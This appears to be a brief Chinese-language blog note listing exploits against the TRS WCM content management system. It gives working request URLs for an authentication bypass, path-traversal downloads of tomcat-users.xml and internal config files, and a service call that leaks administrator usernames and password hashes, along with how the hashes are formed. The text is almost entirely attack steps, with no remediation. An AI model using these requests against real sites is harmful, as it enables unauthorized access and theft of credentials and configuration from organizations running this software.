一、绕过密码登录
1访问网站的登录页
看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的
2 在网址后面添加查看管理员密码的链接
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system
二、任意文件下载漏洞
漏洞1:
漏洞存在于wcm/app/sysrem/read_image.jsp?Filename=…/…/tomcat/conf/tomcat-users.xml
此漏洞需要在登录后才能进行验证
漏洞2
http://xx.xx.xx.xx:8080/wcm/file/read_file.jsp?FileName=U020120628383491551127/…/…/…/…/…/Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
三、用户密码泄露
TRS WCM6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列
访问链接 http://xx.xx.xx.xx:8080/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
加密方式是:常规32位的MD5取前15位
https://github.com/Pa55w0rd/pa55w0rd.github.io.old/blob/3f6ed5092d35bb5bc3884aa8fe9d6aab8d88cf03/_posts/2018-11-08-trs.md